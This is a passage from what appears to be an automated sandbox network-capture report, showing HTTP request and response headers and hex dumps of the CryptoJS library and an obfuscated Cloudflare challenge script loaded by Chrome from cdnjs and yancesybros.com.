                                                    2024-11-25 18:44:27 UTC1369INData Raw: 35 38 37 29 2c 61 63 28 35 34 33 29 2b 68 5b 61 63 28 35 32 35 29 5d 5b 61 63 28 35 37 39 29 5d 2b 61 63 28 35 37 38 29 2b 64 29 2c 67 5b 61 63 28 35 39 34 29 5d 28 61 63 28 35 36 32 29 2c 61 63 28 35 32 30 29 29 2c 67 5b 61 63 28 35 32 37 29 5d 28 4a 53 4f 4e 5b 61 63 28 35 33 32 29 5d 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 64 2c 59 2c 65 29 7b 66 6f 72 28 59 3d 56 2c 65 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 64 3b 65 3d 65 5b 59 28 35 31 30 29 5d 28 4f 62 6a 65 63 74 5b 59 28 34 38 38 29 5d 28 64 29 29 2c 64 3d 4f 62 6a 65 63 74 5b 59 28 35 36 38 29 5d 28 64 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 67 2c 44 2c 58 2c 45 29 7b 58 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 67 5b 44 5d 5b 58 28 35 31 37 29 5d 28 66 75 6e
                                                    Data Ascii: 587),ac(543)+h[ac(525)][ac(579)]+ac(578)+d),g[ac(594)](ac(562),ac(520)),g[ac(527)](JSON[ac(532)](f))}function n(d,Y,e){for(Y=V,e=[];null!==d;e=e[Y(510)](Object[Y(488)](d)),d=Object[Y(568)](d));return e}function m(e,g,D,X,E){X=V;try{return g[D][X(517)](fun
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 61 33 28 35 36 34 29 5d 7c 7c 44 5b 61 33 28 35 30 37 29 5d 2c 27 6e 2e 27 2c 45 29 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 67 5b 61 33 28 35 35 32 29 5d 2c 27 64 2e 27 2c 45 29 2c 69 5b 61 33 28 35 31 38 29 5d 5b 61 33 28 35 33 35 29 5d 28 67 29 2c 46 3d 7b 7d 2c 46 2e 72 3d 45 2c 46 2e 65 3d 6e 75 6c 6c 2c 46 7d 63 61 74 63 68 28 48 29 7b 72 65 74 75 72 6e 20 47 3d 7b 7d 2c 47 2e 72 3d 7b 7d 2c 47 2e 65 3d 48 2c 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 65 2c 64 2c 65 2c 66 2c 67 29 7b 69 66 28 61 65 3d 56 2c 64 3d 68 5b 61 65 28 35 35 30 29 5d 2c 21 64 29 72 65 74 75 72 6e 3b 69 66 28 21 7a 28 29 29 72 65 74 75 72 6e 3b 28 65 3d 21 5b 5d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 66 2c 44 29 7b 28 61 66 3d 61 65 2c 21 65 29 26 26 28 65 3d 21 21 5b 5d 2c 44
                                                    Data Ascii: a3(564)]||D[a3(507)],'n.',E),E=ObdEk5(D,g[a3(552)],'d.',E),i[a3(518)][a3(535)](g),F={},F.r=E,F.e=null,F}catch(H){return G={},G.r={},G.e=H,G}}function C(ae,d,e,f,g){if(ae=V,d=h[ae(550)],!d)return;if(!z())return;(e=![],f=function(af,D){(af=ae,!e)&&(e=!![],D
                                                    2024-11-25 18:44:27 UTC679INData Raw: 6c 41 70 69 41 43 43 48 2c 73 6f 75 72 63 65 2c 70 75 73 68 2c 63 61 74 63 68 2c 62 6f 64 79 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 74 6f 53 74 72 69 6e 67 2c 31 31 31 35 31 39 33 6a 56 4c 77 70 63 2c 63 61 6c 6c 2c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 2c 73 74 79 6c 65 2c 73 65 6e 64 2c 63 68 61 72 41 74 2c 6f 70 65 6e 2c 31 31 36 36 35 33 36 4d 49 6f 6a 4e 51 2c 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 73 74 72 69 6e 67 69 66 79 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 69 73 41 72 72 61 79 2c 72 65 6d 6f 76 65 43 68 69 6c 64 2c 6a 6f 69 6e 2c 73 74 72 69 6e 67 2c 63 68 6c 41 70 69 55 72 6c 2c 65 72 72 6f 72 2c 41 72 72 61 79 2c 44 4f 4d
                                                    Data Ascii: lApiACCH,source,push,catch,body,getOwnPropertyNames,application/json,toString,1115193jVLwpc,call,[native code],_cf_chl_opt,style,send,charAt,open,1166536MIojNQ,XMLHttpRequest,stringify,fromCharCode,isArray,removeChild,join,string,chlApiUrl,error,Array,DOM


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.449788104.17.24.144432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:29 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                    Host: cdnjs.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:29 UTC962INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:29 GMT
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Cache-Control: public, max-age=30672000
                                                    ETag: W/"5eb03e2d-bb78"
                                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                    cf-cdnjs-via: cfworker/kv
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Timing-Allow-Origin: *
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: HIT
                                                    Age: 389016
                                                    Expires: Sat, 15 Nov 2025 18:44:29 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vv0%2F%2FyShyfzgoYTS4mePbrPbW3gC3kDFIBuZ5v3F4cA4lR4FLAMEKom8v8p6vPm7KOtQgQUnAWNCloX%2Bd2D6RnEllddeND2szLo6vPuICxrZzzVmjyMxbr49Cza%2BklWRt%2FfcgxgU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=15780000
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca540f7043c4-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:29 UTC407INData Raw: 37 62 65 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                    Data Ascii: 7be7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                    Data Ascii: &(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typ
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75
                                                    Data Ascii: o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:fu
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72
                                                    Data Ascii: se(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doPr
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e
                                                    Data Ascii: 55===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69
                                                    Data Ascii: 2+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34
                                                    Data Ascii: >6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38
                                                    Data Ascii: S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28
                                                    Data Ascii: clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(
                                                    2024-11-25 18:44:29 UTC1369INData Raw: 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e
                                                    Data Ascii: ),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.449791172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:30 UTC403OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:30 UTC868INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:30 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 8108
                                                    Connection: close
                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                    x-content-type-options: nosniff
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QenT1uH9OoSpHete%2BQQiHKTgNBfukx%2FXYGk9UxFsUG0WGJfkaYgxdBu1LuP5yZqNoShH%2FqyOiZVX3xU8FGE9TzExwaq%2Bx5dVMm8zIX5qZLYGahygqYm9twgG1mKZONogb0Y%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca5acb56de94-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1474&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=981&delivery_rate=1810291&cwnd=229&unsent_bytes=0&cid=f46ff46dd53622c5&ts=484&x=0"
                                                    2024-11-25 18:44:30 UTC501INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 42 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 67 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 70 61 72 73 65 49 6e 74 28 55 28 32 38 35 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 55 28 32 33 35 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 39 36 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 32 36 39 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 32 34 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 33 32 32 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 55 28 32 36 37 29 29 2f 37 2b 70 61 72
                                                    Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,B){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(285))/1+parseInt(U(235))/2+-parseInt(U(296))/3*(-parseInt(U(269))/4)+-parseInt(U(324))/5*(-parseInt(U(322))/6)+parseInt(U(267))/7+par
                                                    2024-11-25 18:44:30 UTC1369INData Raw: 6a 5b 56 28 32 37 38 29 5d 3d 27 62 27 2c 6b 3d 6a 2c 68 5b 56 28 32 37 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 44 2c 45 2c 46 2c 61 30 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 61 30 3d 56 2c 6e 75 6c 6c 3d 3d 3d 44 7c 7c 76 6f 69 64 20 30 3d 3d 3d 44 29 72 65 74 75 72 6e 20 46 3b 66 6f 72 28 48 3d 6e 28 44 29 2c 67 5b 61 30 28 32 35 33 29 5d 5b 61 30 28 32 36 31 29 5d 26 26 28 48 3d 48 5b 61 30 28 33 32 38 29 5d 28 67 5b 61 30 28 32 35 33 29 5d 5b 61 30 28 32 36 31 29 5d 28 44 29 29 29 2c 48 3d 67 5b 61 30 28 32 35 35 29 5d 5b 61 30 28 33 31 33 29 5d 26 26 67 5b 61 30 28 32 33 39 29 5d 3f 67 5b 61 30 28 32 35 35 29 5d 5b 61 30 28 33 31 33 29 5d 28 6e 65 77 20 67 5b 28 61 30 28 32 33 39 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e
                                                    Data Ascii: j[V(278)]='b',k=j,h[V(273)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=n(D),g[a0(253)][a0(261)]&&(H=H[a0(328)](g[a0(253)][a0(261)](D))),H=g[a0(255)][a0(313)]&&g[a0(239)]?g[a0(255)][a0(313)](new g[(a0(239))](H)):function(N
                                                    2024-11-25 18:44:30 UTC1369INData Raw: 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 61 28 32 34 32 29 5d 5b 61 61 28 33 30 33 29 5d 5b 61 61 28 32 35 31 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 61 61 28 32 33 32 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 33 37 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 61 28 32 33 32 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 54 26 31 7c 4f 3c 3c 31 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 33 37 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 